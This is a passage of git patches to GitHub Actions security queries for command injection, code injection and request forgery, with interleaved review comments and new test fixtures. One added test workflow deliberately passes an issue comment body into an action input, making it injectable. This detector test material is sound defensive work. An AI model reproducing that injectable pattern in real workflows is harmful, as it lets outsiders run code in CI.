+ sink.getNode().asExpr().(Expression).getRawExpression()
From f251783c26bb89fdf785de543ec08ce09ef55c26 Mon Sep 17 00:00:00 2001
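Review bot: RequestForgery.ql is added with `@problem.severity error` and `@security-severity 9.1` but, unlike the command- and code-injection pairs in the preceding hunks, its `where` clause has no trigger-event or reusable-workflow restriction, so it reports at error level for any source regardless of how the workflow is triggered. If the Critical*/non-critical split in this commit is meant to encode that distinction, either this query should carry the same `Workflow w` condition or a header comment should say why it is exempt. The header could also note that sinks come solely from the external `request-forgery` models, since there is no in-library sink case here like the `Run` disjunct in ExpressionInjectionSink above.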
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 17:47:20 +0100
Subject: [PATCH 119/707] Apply suggestions from code review
Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com>
---
 ql/src/Security/CWE-078/CommandInjection.ql | 2 +-
 ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++--
 ql/src/Security/CWE-094/CodeInjection.ql | 4 ++--
 ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++---
 ql/src/Security/CWE-918/RequestForgery.ql | 2 +-
 5 files changed, 9 insertions(+), 9 deletions(-)
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql
index 2a2225e17b6e..9891f786f7cb 100644
--- a/ql/src/Security/CWE-078/CommandInjection.ql
+++ b/ql/src/Security/CWE-078/CommandInjection.ql
@@ -34,5 +34,5 @@ import MyFlow::PathGraph
 from MyFlow::PathNode source, MyFlow::PathNode sink
 where MyFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ "Potential command injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
index 3834b0ac0d06..5d418ec18161 100644
--- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql
+++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
@@ -6,7 +6,7 @@
 * @problem.severity error
 * @security-severity 9
 * @precision high
- * @id actions/command-injection
+ * @id actions/critical-command-injection
 * @tags actions
 * security
 * external/cwe/cwe-078
@@ -40,5 +40,5 @@ where
 w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
 )
 select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ "Potential critical command injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
index 7ad0e98bc492..bc2dbffdcdf8 100644
--- a/ql/src/Security/CWE-094/CodeInjection.ql
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
@@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
 
 private class CodeInjectionSink extends DataFlow::Node {
- CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+ CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }
 }
 
 private module MyConfig implements DataFlow::ConfigSig {
@@ -36,5 +36,5 @@ import MyFlow::PathGraph
 from MyFlow::PathNode source, MyFlow::PathNode sink
 where MyFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ "Potential code injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
index 5a4bbaca034a..2a1e4388d24e 100644
--- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql
+++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
@@ -6,7 +6,7 @@
 * @problem.severity error
 * @security-severity 9
 * @precision high
- * @id actions/code-injection
+ * @id actions/critical-code-injection
 * @tags actions
 * security
 * external/cwe/cwe-094
@@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
 
 private class CodeInjectionSink extends DataFlow::Node {
- CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+ CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }
 }
 
 private module MyConfig implements DataFlow::ConfigSig {
@@ -42,5 +42,5 @@ where
 w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
 )
 select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ "Potential critical code injection in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql
index 3675597fcd74..d665a368991d 100644
--- a/ql/src/Security/CWE-918/RequestForgery.ql
+++ b/ql/src/Security/CWE-918/RequestForgery.ql
@@ -33,5 +33,5 @@ import MyFlow::PathGraph
 from MyFlow::PathNode source, MyFlow::PathNode sink
 where MyFlow::flowPath(source, sink)
 select sink.getNode(), source, sink,
- "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ "Potential request forgery in $@, which may be controlled by an external user.", sink,
 sink.getNode().asExpr().(Expression).getRawExpression()
From 46afa9c1f3fc771e0430dd2d0101035d2e208048 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 22:41:01 +0100
Subject: [PATCH 120/707] Add new tests
---
 ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 6 +++---
 ql/src/Security/CWE-078/CommandInjection.ql | 1 +
 .../Security/CWE-078/CriticalCommandInjection.ql | 1 +
 ql/src/Security/CWE-094/CodeInjection.ql | 1 +
 ql/src/Security/CWE-094/CriticalCodeInjection.ql | 1 +
 ql/src/Security/CWE-918/RequestForgery.ql | 1 +
 ql/test/library-tests/test.expected | 3 +++
 .../CWE-078/.github/workflows/comment_issue.yml | 9 +++++++++
 .../Security/CWE-078/CommandInjection.expected | 6 ++++++
 .../Security/CWE-078/CommandInjection.qlref | 1 +
 .../CWE-078/CriticalCommandInjection.expected | 6 ++++++
 .../CWE-078/CriticalCommandInjection.qlref | 1 +
 .../Security/CWE-094/CodeInjection.expected | 14 ++++++++++++++
 .../Security/CWE-094/CodeInjection.qlref | 1 +
 .../CWE-094/CriticalCodeInjection.expected | 14 ++++++++++++++
 .../Security/CWE-094/CriticalCodeInjection.qlref | 1 +
 .../CWE-094/CriticalExpressionInjection.expected | 10 ----------
 .../Security/CWE-094/ExpressionInjection.expected | 10 ----------
 .../Security/CWE-918/.github/workflows/test.yml | 10 ++++++++++
 .../Security/CWE-918/RequestForgery.expected | 6 ++++++
 .../Security/CWE-918/RequestForgery.qlref | 1 +
 21 files changed, 81 insertions(+), 23 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
 create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.expected
 create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
 create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected
 create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref
 create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.expected
 create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref
 create mode 100644
ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected
 create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref
 create mode 100644 ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
 create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.expected
 create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index 7e265fb2570d..08f8b6b93630 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -86,8 +86,10 @@ predicate externallyDefinedStoreStep(
 )
 }
 
-predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) {
+predicate externallyDefinedSink(DataFlow::Node sink, string kind) {
 exists(Uses uses, string action, string version, string input |
+ sinkModel(action, version, input, kind) and
+ uses.getCallee() = action.toLowerCase() and
 (
 if input.trim().matches("env.%")
 then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", ""))
@@ -96,8 +98,6 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) {
 then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", ""))
 else none()
 ) and
- sinkModel(action, version, input, kind) and
- uses.getCallee() = action.toLowerCase() and
 (
 if version.trim() = "*"
 then uses.getVersion() = any(string v)
diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql
index 9891f786f7cb..bdc341e8caf1 100644
--- a/ql/src/Security/CWE-078/CommandInjection.ql
+++ b/ql/src/Security/CWE-078/CommandInjection.ql
@@ -13,6 +13,7 @@
 */
 
 import actions
+import codeql.actions.DataFlow
 import codeql.actions.TaintTracking
 import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
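Review bot: The signature of `externallyDefinedSink` is widened from `DataFlow::ExprNode` to `DataFlow::Node`, but the body still only constrains `sink.asExpr()`, so a node without an expression silently never matches; a QLDoc line stating that only nodes with an `asExpr()` can be sinks of a model would make that contract explicit. Moving `sinkModel(...)` and `uses.getCallee() = action.toLowerCase()` ahead of the `if` conjunct looks like a binding-order change (so `action` and `input` are bound from the model before `input.trim()` is evaluated), but nothing records why, and a one-line comment such as `// bind action/input from the model before the string matching below` would stop a later reformat from undoing it. I also cannot tell from here whether `uses.getCallee()` is already lowercased on the workflow side; if it returns the `uses:` reference as written, a mixed-case reference would not match the lowercased model name. The enclosing predicate continues outside the hunk.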
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
index 5d418ec18161..dddbd142873f 100644
--- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql
+++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
@@ -13,6 +13,7 @@
 */
 
 import actions
+import codeql.actions.DataFlow
 import codeql.actions.TaintTracking
 import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
index bc2dbffdcdf8..3bac9cec348d 100644
--- a/ql/src/Security/CWE-094/CodeInjection.ql
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
@@ -15,6 +15,7 @@
 */
 
 import actions
+import codeql.actions.DataFlow
 import codeql.actions.TaintTracking
 import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
index 2a1e4388d24e..64d8a6e43286 100644
--- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql
+++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
@@ -15,6 +15,7 @@
 */
 
 import actions
+import codeql.actions.DataFlow
 import codeql.actions.TaintTracking
 import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql
index d665a368991d..228c94f383b9 100644
--- a/ql/src/Security/CWE-918/RequestForgery.ql
+++ b/ql/src/Security/CWE-918/RequestForgery.ql
@@ -12,6 +12,7 @@
 */
 
 import actions
+import codeql.actions.DataFlow
 import codeql.actions.TaintTracking
 import codeql.actions.dataflow.FlowSources
 import codeql.actions.dataflow.ExternalFlow
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index df8c6ddf9cda..5395fe824535 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -315,6 +315,9 @@ scopes
 sources
 | ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files |
 | ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files |
+| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title |
+| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch |
+| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details |
 | dorny/paths-filter | * | output.changes | pull_request_target | PR changed files |
 | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body |
 | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title |
diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
new file mode 100644
index 000000000000..4b6888449c00
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml
@@ -0,0 +1,9 @@
+on: issue_comment
+
+jobs:
+ test1:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: ruby/setup-ruby@v2
+ with:
+ ruby-version: ${{ github.event.comment.body }}
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected
new file mode 100644
index 000000000000..decabad082fb
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected
@@ -0,0 +1,6 @@
+edges
+nodes
+| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body |
+subpaths
+#select
+| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
new file mode 100644
index 000000000000..e38b88f29197
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-078/CommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected
new file mode 100644
index 000000000000..8a3d19402b7c
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected
@@ -0,0 +1,6 @@
+edges
+nodes
+| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body |
+subpaths
+#select
+| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref
new file mode 100644
index 000000000000..ceb027c8058d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref
@@ -0,0 +1 @@
+Security/CWE-078/CriticalCommandInjection.ql
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
new file mode 100644
index 000000000000..4ef832d9d22e
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected
@@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref new file mode 100644 index 000000000000..fe9adbf3b64d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected new file mode 100644 index 000000000000..697cf2a310e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected 
@@ -0,0 +1,14 @@ +edges +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +nodes +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +subpaths +#select +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential critical code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential critical code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref new file mode 100644 index 000000000000..05ef02c50948 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/CriticalCodeInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index aa9d9ae2fc43..8236c4d78291 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -3,7 +3,6 @@ edges
 | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE |
 | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] |
 | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files |
-| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log |
 | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced |
 | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced |
 | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] |
@@ -64,15 +63,10 @@ nodes
 | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced |
 | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files |
 | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files |
-| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title |
-| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log |
 | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body |
 | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body |
 | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body |
 | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title |
-| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body |
-| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body |
-| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title |
 | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body |
 | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body |
 | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body |
@@ -201,14 +195,10 @@ nodes
 subpaths
 #select
 | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced |
-| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log |
 | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body |
 | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user.
| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body |
 | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body |
 | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | github.event.issue.title |
-| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | github.event.comment.body |
-| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user.
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | github.event.issue.body |
-| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | github.event.issue.title |
 | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | github.event.comment.body |
 | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | github.event.issue.body |
 | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | github.event.comment.body |
diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
index d4fd27b18d4f..f852a1b59815 100644
--- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
+++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected
@@ -3,7 +3,6 @@ edges
 | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE |
 | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] |
 | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files |
-| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log |
 | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced |
 | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced |
